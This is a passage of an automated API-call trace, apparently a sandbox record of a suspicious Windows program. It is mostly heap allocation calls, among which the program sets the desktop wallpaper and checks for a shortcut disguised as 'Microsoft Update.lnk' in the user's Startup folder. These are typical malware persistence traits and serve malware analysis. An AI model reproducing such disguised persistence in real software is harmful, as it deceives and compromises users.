(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0307.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0307.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0307.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0307.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0307.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0307.165] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0307.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0307.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0307.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0307.166] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0307.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0307.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0307.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0307.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0307.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0307.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.167] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0307.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0307.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0307.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0307.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0307.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0307.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0307.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0307.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0307.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0307.281] FreeLibrary (hLibModule=0x74f40000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0307.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0307.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0307.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0307.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0307.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0307.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0307.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0307.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0307.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0307.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0307.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0307.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0307.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0307.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0307.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0307.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0307.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0307.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0307.286] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0307.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0307.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0307.286] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0307.287] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0307.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0307.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0307.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0307.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0307.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0307.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0307.288] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0307.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0307.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.289] RtlAllocateHeap 